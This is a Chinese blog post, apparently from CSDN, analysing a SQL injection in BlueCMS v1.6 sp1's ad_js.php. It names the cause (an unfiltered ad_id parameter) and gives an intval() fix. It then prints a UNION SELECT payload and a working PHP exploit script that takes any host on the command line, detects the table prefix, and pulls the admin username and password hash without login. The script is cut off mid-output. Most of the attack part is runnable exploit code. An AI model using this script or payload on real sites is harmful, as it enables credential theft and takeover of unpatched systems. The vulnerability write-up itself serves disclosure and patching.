ad_js.php漏洞防护,BlueCMS v1.6 sp1 ad_js.php SQL注入漏洞分析

最新推荐文章于 2023-10-15 14:35:59 发布
最新推荐文章于 2023-10-15 14:35:59 发布
阅读量191 收藏
点赞数
文章标签: BlueCMS SQL注入 漏洞分析 修复方案 安全防护

BlueCMS(地方分类信息门户专用CMS系统)

基于当今最流行的开源组合PHP+MYSQL开发

每个分类均可单独设置Title、Keywords、Description,方便SEO

强力模板引擎,显示风格自由定义,随心所欲

多功能模块插件,操作简单方便

智能缓存技术,提高网站性能

多属性模型自定义,栏目功能强大

缺陷文件:ad_js.php

漏洞成因:

12: $ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : ''; //根目录下其他文件都做了很好的过滤,

对数字型变量几乎都用了intval()做限制,唯独漏了这个文件,居然只是用了trim()去除头尾空格。。

19: $ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id); //直接代入查询。。汗。

修补方案:

$ad_id = !empty($_GET['ad_id']) ? intval($_GET['ad_id']) : '';

漏洞Poc:

(admin_name,0x7C0D0A,pwd),concat(admin_name,0x7C0D0A,pwd)%20from%20blue_admin%

20where%20admin_id=1

右键查看源代码得到返回数据。

漏洞Exp:

print_r('

------------------------------------------

BlueCMS v1.6 sp1 "ad_js.php" SQL Injection

get admin_user pwd-hash without login

by CnCxzSec衰仔 http://hi.baidu.com/cncxz

------------------------------------------

');

if($argc<3){

print_r('

------------------------------------------

usage:php '.$argv[0].' host path

host: without "http://"

path: path to bluecms

example:

php '.$argv[0].' localhost /

------------------------------------------

');

die;

}

$host=$argv[1];

$path=$argv[2];

$inj="/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,concat

(admin_name,0x7C0D0A,pwd),concat(admin_name,0x7C0D0A,pwd)%20from%20blue_admin%

20where%20admin_id=1";

print_r("[*]exploiting, please wait...");

$fp=fsockopen($host, 80, $errno, $errstr, 30);

if(!$fp) echo "$errstr($errno)
\n";

else{

$head ="GET $path"."$inj HTTP/1.1\r\n";

$head .="Host:".$host."\r\n";

$head .="Connection: Close\r\n\r\n";

$result='';

fputs($fp,$head);

while(!feof($fp)){

$result .=fgets($fp,4096);

}

if (!eregi("document",$result)){

$temp=explode("FROM ",$result);

if(isset($temp[1])){$temp2=explode("ad",$temp[1]);}

if($temp2[0])

$prefix=$temp2[0];

print_r('

[*]prefix -> '.$prefix);

$inj="/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,concat

(admin_name,0x7C0D0A,pwd),concat(admin_name,0x7C0D0A,pwd)%20from%20".$prefix."admin%

20where%20admin_id=1";

$fp=fsockopen($host, 80, $errno, $errstr, 30);

if(!$fp) echo "$errstr($errno)
\n";

else{

$head ="GET $path"."$inj HTTP/1.1\r\n";

$head .="Host:".$host."\r\n";

$head .="Connection: Close\r\n\r\n";

$result='';

fputs($fp,$head);

while(!feof($fp)){

$result .=fgets($fp,4096);

}

fclose($fp);

$rs1=strstr($result,"\"");

$name=substr($rs1,1,strpos($rs1,"")-1);

$pass=substr($rs1,strpos($rs1,"")+5,32);

print_r('

[*]we get it!');

print_r('

username:'.$name);

weixin_39674293
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
代码审计:bluecms 前台ad_js.php注入复现
qq_43233085的博客
03-15 799
代码审计:bluecms 前台ad_js.php注入复现bluecms代码审计漏洞复现 bluecms BlueCMS是一款专注于地方门户网站建设解决方案,基于PHP+MySQL的技术开发,全部源码开放。 复现版本为bluecmsv1.6版本,各位可自行下载。 代码审计 先使用Seay工具审计一波,根据关键代码回溯。 工具显示ad_js.php存在sql注入,我们打开代码所在php文件进一步查看...
PHP地方门户系统-BlueCMS v1.6 sp1.rar
07-07
bluecms v1.6 升级到 bluecms v1.6 sp1版说明: 解决问题: 1.修正所有已知错误 2.前后台整合通用编辑器fckeditor,替换之前的editor 3.增加前台发布新闻过滤 4.增加禁止词语过滤 5.增加同一用户注册时间间隔...
ad_js.php sql,BlueCMS v1.6 sp1 ad_js.php SQL注入漏洞
weixin_36080653的博客
03-10 197
漏洞概要缺陷编号:WooYun-2010-0141漏洞标题:BlueCMS v1.6 sp1 ad_js.php SQL注入漏洞相关厂商:BlueCMS漏洞作者:CnCxzSec(衰仔)提交时间:2010-07-30 19:49公开时间:2010-07-30 21:52漏洞类型:SQL注射漏洞危害等级:高自评Rank:20漏洞状态:未联系到厂商或者厂商积极忽略Tags标签:漏洞详情披露状态:201...
代码审计之SQL注入BlueCMSv1.6 sp1
weixin_30535843的博客
12-07 322
Preface 这是一篇纪录关于BlueCMSv1.6 sp1两个SQL注入的审计过程,原文来自代码审计之SQL注入BlueCMSv1.6 sp1,主要纪录一下个人在参考博文复现这两个漏洞经过。 参看视频:BlueCMS 1.6 SQL 注入漏洞 工具及环境 bluecms v2.1 sp1     链接:http://pan.baidu.com/s/1dFKLanR...
ad_js.php漏洞防护,BlueCMS v1.6 sp1 adjs.php SQL注入漏洞漏洞预警 -电脑资料
weixin_30261255的博客
04-13 150
影响版本:BlueCMS v1.6 sp1漏洞描述:缺陷文件:ad_js.php漏洞成因:12: $ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : ''; //根目录下其他文件都做了很好的过滤,对数字型变量几乎都用了intval()做限制,唯独漏了这个文件,居然只是用了trim()去除头尾空格,http://www.wooyun.or...
ad_js.php漏洞防护,BlueCMS v1.6 sp1 adjs.php SQL注入漏洞分析脚本安全 -电脑资料
weixin_42536058的博客
04-13 307
官方简介:www.bluecms.netBlueCMS(地方分类信息门户专用CMS系统)基于当今最流行的开源组合PHP+MYSQL开发每个分类均可单独设置Title、Keywords、Description,方便SEO强力模板引擎,显示风格自由定义,随心所欲多功能模块插件,操作简单方便智能缓存技术,提高网站性能多属性模型自定义,栏目功能强大缺陷文件:ad_js.php漏洞成因:12: $ad_id...
bluecms_v1.6_sp1.zip
最新发布
01-25
"bluecms_v1.6_sp1.zip" 是一个软件压缩包,主要包含了一个名为 "bluecms_v1.6_sp1" 的更新版本。这个版本可能是针对 "BlueCMS" 系统的一个更新,版本号为 1.6 Service Pack 1(SP1),通常SP代表着一个重要的补丁或...
Bluecms内容管理系统 v1.6sp1
03-19
(一)运行环境需求: 可用的httpd服务器(如Apache、Zeus、IIS等) PHP4.3.0及以上 ...v1.6演示地址:http://www.bluecms.net/demo 官方网站:http://www.bluecms.net/ 官方论坛:htpp://www.bluecms.net/bbs
BlueCMS漏洞大集合
02-03
client_ip伪造注入看代码吧,这里的getip函数是获取Ip的,由于,client_ip和x_forwarded_for都可以伪造。在include/common.fun.php的106行我们继续跟踪一下getip()这个函数的应用。comment.php中的113行这里我们伪造...
BlueCMS v1.6 代码审计之SQL注入
good good study
08-23 4641
目录 sql注入1 sql注入2 hackbar提交post数据 最近开始入坑代码审计,而最好的学习方式就是模仿,站在前人的肩膀上,能让我们更加快速的成长。 blueCMS是一款小众的CMS,网上也有人发布其相关漏洞。接下来对已公布的漏洞进行源码分析 环境准备 BlueCMS v1.6 phpstudy 2018 php5.5.35 phpstorm sql注入1 首先查看配置文件,发现网站有统一的过滤方法,在文件common.inc.php中,对$_post、$_get、$_co
代码审计—Bluecms—sql—ad_js.php
王嘟嘟的博客
10-26 696
0x00 前言 如饥似渴的学习ing。 你可能需要看看这个: https://blog.csdn.net/qq_36869808/article/details/83029980 内容说明 这个漏洞大家之前都复现过,但是我也想试一试。我也不知道大佬们是怎么挖掘出来的。难道真的是一个参数一个参数进行尝试吗。这些疑问都是需要解决的。 0x01 start 1.黑盒测试 首先来看一下sql注入点 htt...
ad_js.php getshell,Dedecms 后台getshell
weixin_36476695的博客
03-18 232
原文链接:传送门虽然是复现文章,不过会更详细地来阐释这个漏洞,,因为现在后台getshell花样层出不穷,因此想要复现一波来学习一波getshell姿势~因为是最新的dedecms版本,因此我们直接在织梦官网上下载即可~http://www.dedecms.com/products/dedecms/downloads/DedeCMS V5.7 SP2正式版发布日期: 2017-04-05这里我测试...
ad_js.php sql,BlueCMS审计学习笔记
weixin_36397104的博客
03-10 269
原标题:BlueCMS审计学习笔记这篇只能算是学习笔记,因为bluecms是我第一次审计的CMS,所以参考了不少前辈们的经验。参考文章于文末给出。算是一个记录了我的学习心得,学习的过程的文章。一.实践总结:1.可以按照功能点审计,比如评论处是否支持匿名,有没有获取ip处存在sql注入(X-FORWARD-FOR),头像处能否上传图片马;2.文件包含漏洞除了可以爆关键文件外,也可以和其它漏洞结合(比...
dedecms ad_js.php,广告管理
weixin_36084095的博客
03-10 152
广告管理是dedecms网站中比较常用的一个模块,为网站盈利提供方便。广告管理的安装、卸载等方法已经在模块管理中有所介绍。1.广告管理包含的文件:/dede/ad_main.php后台管理主页面/dede/ad_add.php后台广告添加页面/dede/ad_edit.php后台广告编辑页面/dede/templets/ad_add.htm后台广告添加页面模板/dede/templets/...
dedecms ad_js.php,织梦dedecms dede plus文件作用介绍及安全设置
weixin_36054213的博客
03-10 486
一、安装设置1、默认的后台模块中心有很多模块。这里除了"友情链接"模块其他都可以删掉。在后台可以先卸载再删除。2、如果是一开始就不想要的话,安装版plus目录下进行如下操作。删除:guestbook文件夹【留言板,后面我们安装更合适的留言本插件】;删除:task文件夹和task.php【计划任务控制文件】删除:ad_js.php【广告】删除:bookfeedback.php和bookfeedbac...
BlueCMS_V1.6 ad_js.php页面存在SQL注入
weixin_53303754的博客
10-15 306
2、使用order by查看有多少字段,order by 8报错,所以字段数为7。接下来选择爆blue_admin这个表。order by 7没有报错。返回还是空白网页,需查看源码。得到数据库名为“blue”右键点击,查看网页源代码。执行后继续查看网页源代码。执行后继续查看网页源代码。
ad js.php aid,应急响应实例分享
weixin_39862847的博客
03-11 519
1.事件简述某天,发现网站被百度提示页面部分已被非法篡改。通过查看百度快照,发现网站首页确实被篡改,插入内容被编码,解码内容如下从上可确认,网站确实存在页面篡改情况。2.排查过程本次的排查过程还是很有趣的,中间还是有好多雷点,首先登录网站管理后台,发现网站首页篡改时间为10月6号。通过对日志进行分析发现攻击者通过test.php写入optimized.php后门,写入时间为06/Oct/2019:...
bluecms sql注入
11-02
BlueCMS v1.6存在SQL注入漏洞,攻击者可以通过构造恶意的SQL语句来获取敏感信息或者执行非法操作。攻击者可以通过爆出blue_admin中的字段名来获取更多的信息。具体方法是通过访问`/bluecms_1.6/uploads/ad_js.php?...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值